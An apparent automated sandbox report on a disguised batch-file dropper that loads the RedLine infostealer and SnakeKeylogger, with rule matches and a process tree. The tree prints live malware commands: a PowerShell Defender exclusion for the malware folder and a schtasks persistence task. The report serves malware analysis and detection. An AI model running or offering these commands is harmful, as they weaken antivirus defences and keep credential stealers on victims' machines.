                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C60D813_2_051C60D8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C739013_2_051C7390
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C6D4813_2_051C6D48
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C79E013_2_051C79E0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C359813_2_051C3598
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C358813_2_051C3588
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C15F813_2_051C15F8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C15E813_2_051C15E8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C243813_2_051C2438
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C242713_2_051C2427
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C049813_2_051C0498
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C048813_2_051C0488
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C869F13_2_051C869F
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C86B013_2_051C86B0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C46F813_2_051C46F8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C46E913_2_051C46E9
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C313213_2_051C3132
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C314013_2_051C3140
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C119013_2_051C1190
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C919013_2_051C9190
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C11A013_2_051C11A0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C51D813_2_051C51D8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C51E813_2_051C51E8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C000613_2_051C0006
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C802413_2_051C8024
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C004013_2_051C0040
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C60C913_2_051C60C9
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C738013_2_051C7380
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C429013_2_051C4290
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C42A013_2_051C42A0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C0D3913_2_051C0D39
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C6D3713_2_051C6D37
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C0D4813_2_051C0D48
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C2CD813_2_051C2CD8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C2CE813_2_051C2CE8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C3E3813_2_051C3E38
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C3E4813_2_051C3E48
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C1E9A13_2_051C1E9A
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C1EA813_2_051C1EA8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C79D013_2_051C79D0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C39F013_2_051C39F0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C39E113_2_051C39E1
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C289013_2_051C2890
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C288013_2_051C2880
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C08F013_2_051C08F0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C08E113_2_051C08E1
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C4B5013_2_051C4B50
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C4B4013_2_051C4B40
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C1A5013_2_051C1A50
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C1A4013_2_051C1A40
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_007EB49014_2_007EB490
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 21_2_02B920C421_2_02B920C4
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_00408C6024_2_00408C60
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_0040DC1124_2_0040DC11
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_00407C3F24_2_00407C3F
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_00418CCC24_2_00418CCC
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_00406CA024_2_00406CA0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_004028B024_2_004028B0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_0041A4BE24_2_0041A4BE
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_0041824424_2_00418244
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_0040165024_2_00401650
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_00402F2024_2_00402F20
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_004193C424_2_004193C4
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_0041878824_2_00418788
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_00402F8924_2_00402F89
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_00402B9024_2_00402B90
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_004073A024_2_004073A0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_31D7103024_2_31D71030
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_31D7102024_2_31D71020
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_351847B824_2_351847B8
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_351847A824_2_351847A8
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 25_2_02DB20C425_2_02DB20C4
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 25_2_02DBD59B25_2_02DBD59B
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_00408C6029_2_00408C60
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_0040DC1129_2_0040DC11
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_00407C3F29_2_00407C3F
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_00418CCC29_2_00418CCC
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_00406CA029_2_00406CA0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_004028B029_2_004028B0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_0041A4BE29_2_0041A4BE
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_0041824429_2_00418244
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_0040165029_2_00401650
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_00402F2029_2_00402F20
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_004193C429_2_004193C4
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_0041878829_2_00418788
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_00402F8929_2_00402F89
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_00402B9029_2_00402B90
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_004073A029_2_004073A0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_24E3102029_2_24E31020
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_24E3103029_2_24E31030
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_253F47B829_2_253F47B8
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_253F47A829_2_253F47A8
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_00408C6029_1_00408C60
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_0040DC1129_1_0040DC11
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_00407C3F29_1_00407C3F
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_00418CCC29_1_00418CCC
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_00406CA029_1_00406CA0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_004028B029_1_004028B0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_0041A4BE29_1_0041A4BE
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_0041824429_1_00418244
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_0040165029_1_00401650
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_00402F2029_1_00402F20
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_004193C429_1_004193C4
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_0041878829_1_00418788
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_00402F8929_1_00402F89
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_00402B9029_1_00402B90
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_004073A029_1_004073A0
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_05841B9430_2_05841B94
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_0584DAAC30_2_0584DAAC
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_0584E5AF30_2_0584E5AF
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_058425A830_2_058425A8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_058425B830_2_058425B8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_0584E60830_2_0584E608
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_0584417A30_2_0584417A
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_05841D2030_2_05841D20
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_05841B8830_2_05841B88
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_05841BE830_2_05841BE8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_058B336030_2_058B3360
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\rpkhzpuO.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02C3480C appears 931 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02C344AC appears 73 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02C346A4 appears 244 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02C344D0 appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02C487A0 appears 54 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02C48824 appears 45 times
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02B946A4 appears 154 times
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02DB46A4 appears 154 times
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02DB480C appears 619 times
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02DC87A0 appears 48 times
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02B9480C appears 619 times
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02BA87A0 appears 48 times
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 0040FB9C appears 40 times
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 0040D606 appears 96 times
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 0040E1D8 appears 176 times
                      Source: 10.1.rpkhzpuO.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 24.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 24.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 10.1.rpkhzpuO.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 29.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 29.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 29.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 29.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0000001D.00000002.2840097800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000001D.00000001.2760141830.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@42/20@3/3
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C37F5A GetDiskFreeSpaceA,6_2_02C37F5A
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9,10_1_004019F0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C46D50 CoCreateInstance,6_2_02C46D50
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9,10_1_004019F0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\OupzhkprF.cmdJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\xJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A10_1_00413780
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A24_2_00413780
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A29_2_00413780
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A29_2_00413780
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A29_1_00413780
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.000000000273C000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.000000000271E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.000000000275D000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.0000000002751000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4649310348.000000000366D000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.000000000272E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: PO#3_RKG367.batReversingLabs: Detection: 23%
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\Desktop\PO#3_RKG367.bat"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exe
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
